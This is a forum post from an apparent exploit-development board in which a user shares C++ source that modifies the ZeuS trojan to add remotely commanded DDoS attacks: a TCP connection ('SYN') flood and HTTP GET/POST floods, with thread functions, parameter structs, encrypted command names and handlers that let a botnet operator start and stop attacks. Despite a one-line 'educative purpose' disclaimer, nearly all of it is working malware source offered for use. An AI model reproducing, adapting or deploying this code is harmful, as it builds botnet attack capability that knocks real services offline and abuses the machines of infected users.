Jump to content
Cartman.

ZeuS dDoS Mod (SYN + HTTP Flooder

By Cartman., in Reverse engineering & exploit development

Recommended Posts

Cartman. Newbie

Cartman.

Posted
Posted

Here is some PoC sample how to modify ZeuS source to add dDoS function. This is just for educative purpose and not for illegal use.

ddos.cpp

#include <windows.h>
#include <ws2tcpip.h>
#include <wininet.h>

#include "defines.h"
#include "core.h"
#include "ddos.h"

#include "..\common\debug.h"
#include "..\common\mem.h"
#include "..\common\str.h"
#include "..\common\wsocket.h"
#include "..\common\wininet.h"
#include "..\common\httptools.h"

bool gl_bStopDdos;

DWORD WINAPI synFlood(LPVOID lpParam)
{
	DWORD dwTime;
	SOCKET sock[MAX_SYN_SOCKETS];
	int iSockets;

	SSYNFlood s_sf = *((SSYNFlood *)lpParam);

	/*
	if (!CWA(ws2_32, gethostbyname)(s_sf.m_szHost))
	{
		WDEBUG0(WDDT_ERROR, "SYN flooding failed !gethostbyname()");
		return 0;
	}
	*/

	if(s_sf.m_nPort <= 0 || s_sf.m_nPort > 65535) s_sf.m_nPort = 80;

	gl_bStopDdos = false;

	WDEBUG5(WDDT_INFO, "SYN flooding host: %s, port: %u, sockets: %u, delay: %ums, time: %umin.", s_sf.m_szHost, s_sf.m_nPort, s_sf.m_nSockets, s_sf.m_nDelay, s_sf.m_dwTime);

	//dwTime = CWA(kernel32, GetTickCount)();
	dwTime = GetTickCount();

	while ((/*CWA(kernel32, GetTickCount)()*/ GetTickCount() - dwTime) <= (s_sf.m_dwTime * 60000) && gl_bStopDdos == false)
	{
		iSockets = 0;
		for (DWORD i = 0; i < s_sf.m_nSockets; i++)
		{
			sock[i] = WSocket::tcpConnectA(Str::_unicodeToAnsiEx(s_sf.m_szHost, -1), s_sf.m_nPort);
			if(sock[i] != INVALID_SOCKET)
			{
				WSocket::tcpDisableDelay(sock[i], true);
				WSocket::tcpSetKeepAlive(sock[i], true, 300000, 5000);
				iSockets++;
			}else{
				break;
			}
		}

		//CWA(kernel32, Sleep)(s_sf.m_nDelay);
		Sleep(s_sf.m_nDelay);

		for (DWORD i = 0; i < iSockets; i++)
		{
			WSocket::tcpClose(sock[i]);
		}
	}

	WDEBUG2(WDDT_INFO, "finished SYN flooding target: %s, after: %d min", s_sf.m_szHost, (GetTickCount() - dwTime) / 60000);

	return 1;
}

DWORD WINAPI httpFlood(LPVOID lpParam)
{
	SHTTPFlood s_hf = *((SHTTPFlood *)lpParam);

	Wininet::CALLURLDATA cud;
	//Mem::_zero(&cud, sizeof(Wininet::CALLURLDATA));

	cud.bAutoProxy                 = true;
	cud.bTryCount                  = 1;
	cud.dwRetryDelay               = 0;
	cud.hStopEvent                 = coreData.globalHandles.stopEvent;
	cud.pstrUserAgent              = Wininet::_GetIEUserAgent();
	cud.pstrURL                    = Str::_unicodeToAnsiEx(s_hf.m_szUrl, -1);
	cud.Connect_dwFlags            = 0;
	cud.SendRequest_pstrReferer    = NULL;
	cud.SendRequest_pPostData      = s_hf.m_szPostData;
	cud.SendRequest_dwPostDataSize = Str::_LengthW(s_hf.m_szPostData);
	cud.SendRequest_dwFlags        = s_hf.m_nWisrfMethod;
	cud.DownloadData_dwSizeLimit   = 512 * 1024;
	cud.DownloadData_pstrFileName  = NULL;

	//DWORD time = CWA(kernel32, GetTickCount)();
	DWORD time = GetTickCount();

	gl_bStopDdos = false;

	WDEBUG3(WDDT_INFO, "HTTP flooding host: %s, delay: %ums, times: %u", s_hf.m_szUrl, s_hf.m_nDelay, s_hf.m_nTimes);

	DWORD i;

	for (i = 0; i < s_hf.m_nTimes; i++)
	{
		if(gl_bStopDdos)
		{
			break;
		}

		Wininet::_CallURL(&cud, NULL);

		//CWA(kernel32, Sleep)(s_hf.m_nDelay);
		Sleep(s_hf.m_nDelay);
	}

	WDEBUG2(WDDT_INFO, "finished HTTP flooding target: %s, after: %u times", s_hf.m_szUrl, (i+1));
	return 1;
}

ddos.h

#pragma once

#define MAX_SYN_SOCKETS 250

typedef struct
{
	LPWSTR m_szHost;
	DWORD m_nPort;
	DWORD m_nSockets;
	DWORD m_nDelay;
	DWORD m_dwTime;
}SSYNFlood;

typedef struct
{
	LPWSTR m_szUrl;
	LPWSTR m_szPostData;
	DWORD m_nDelay;
	DWORD m_nTimes;
	DWORD m_nWisrfMethod;
}SHTTPFlood;

DWORD WINAPI httpFlood(LPVOID lpParam);
DWORD WINAPI synFlood(LPVOID lpParam);
extern bool gl_bStopDdos;

cryptedsettings.txt

remotescript_command_ddos_syn                "ddos_syn"
remotescript_command_ddos_http_post          "ddos_http_post"
remotescript_command_ddos_http_get           "ddos_http_get"
remotescript_command_ddos_stop               "ddos_stop"

cryptedsettings.h

    id_remotescript_command_ddos_syn,
    id_remotescript_command_ddos_http_post,
    id_remotescript_command_ddos_http_get,
    id_remotescript_command_ddos_stop,

    len_remotescript_command_ddos_syn = (8 + 1),
    len_remotescript_command_ddos_http_post = (14 + 1),
    len_remotescript_command_ddos_http_get = (13 + 1),
    len_remotescript_command_ddos_stop = (9 + 1),

    id_remotescript_command_ddos_syn,
    id_remotescript_command_ddos_http_post,
    id_remotescript_command_ddos_http_get,
    id_remotescript_command_ddos_stop,

remotescripts:

#include <ws2tcpip.h>
#include "ddos.h"
#include "..\common\wsocket.h"

static bool ddosSyn(const LPWSTR *arguments, DWORD argumentsCount)
{
  bool ok = false;
  SSYNFlood s_sf;

  if(argumentsCount >= 6)
  {
	s_sf.m_szHost = arguments[1];
	s_sf.m_nPort = (DWORD)Str::_ToInt32W(arguments[2], NULL);
	s_sf.m_nSockets = (DWORD)Str::_ToInt32W(arguments[3], NULL);
	s_sf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[4], NULL);
	s_sf.m_dwTime = (DWORD)Str::_ToInt32W(arguments[5], NULL);

	//if(CWA(ws2_32, getaddrinfo)(Str::_unicodeToAnsiEx(s_sf.m_szHost, -1), NULL, NULL, NULL))
	//{
		if(s_sf.m_nPort > 0 && s_sf.m_nSockets > 0 && s_sf.m_nSockets <= MAX_SYN_SOCKETS && s_sf.m_nDelay >= 0 && s_sf.m_dwTime > 0 && s_sf.m_szHost != NULL)
		{
		  ok = true;
		}else{
			WDEBUG0(WDDT_ERROR, "SYN flooding failed because invalid arguments");
		}
	//}else{
	//	WDEBUG0(WDDT_ERROR, "SYN flooding failed !getaddrinfo()");
	//}
  }

  if(ok) hSynFlood = CWA(kernel32, CreateThread)(NULL, 0, synFlood, &s_sf, 0, NULL);

  return ok;
}

static bool ddosHttp(const LPWSTR *arguments, DWORD argumentsCount, bool isPostRequest)
{
  bool ok = false;
  SHTTPFlood s_hf;

  if(isPostRequest)
  {
	  if(argumentsCount >= 5)
	  {
		s_hf.m_nWisrfMethod = 1; //POST
		s_hf.m_szUrl = arguments[1];
		s_hf.m_szPostData = arguments[2];
		s_hf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[3], NULL);
		s_hf.m_nTimes = (DWORD)Str::_ToInt32W(arguments[4], NULL);

		ok = true;
	  }
  }else{
	  if(argumentsCount >= 4)
	  {
		s_hf.m_nWisrfMethod = 0; //GET
		s_hf.m_szUrl = arguments[1];
		s_hf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[2], NULL);
		s_hf.m_nTimes = (DWORD)Str::_ToInt32W(arguments[3], NULL);
		s_hf.m_szPostData = NULL;

		ok = true;
	  }
  }

  if(ok) 
  {
	  if(s_hf.m_szUrl != NULL && s_hf.m_nDelay >= 0 && s_hf.m_nTimes > 0)
		  hHttpFlood = CWA(kernel32, CreateThread)(NULL, 0, httpFlood, &s_hf, 0, NULL);
  }
  return ok;
}

static bool ddosHttpPost(const LPWSTR *arguments, DWORD argumentsCount)
{
  return ddosHttp(arguments, argumentsCount, true);
}

static bool ddosHttpGet(const LPWSTR *arguments, DWORD argumentsCount)
{
  return ddosHttp(arguments, argumentsCount, false);
}

static bool ddosStop(const LPWSTR *arguments, DWORD argumentsCount)
{
  gl_bStopDdos = true;
  return true;
}

  {CryptedStrings::id_remotescript_command_ddos_syn,                ddosSyn},
  {CryptedStrings::id_remotescript_command_ddos_http_post,          ddosHttpPost},
  {CryptedStrings::id_remotescript_command_ddos_http_get,           ddosHttpGet},
  {CryptedStrings::id_remotescript_command_ddos_stop,               ddosStop},

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...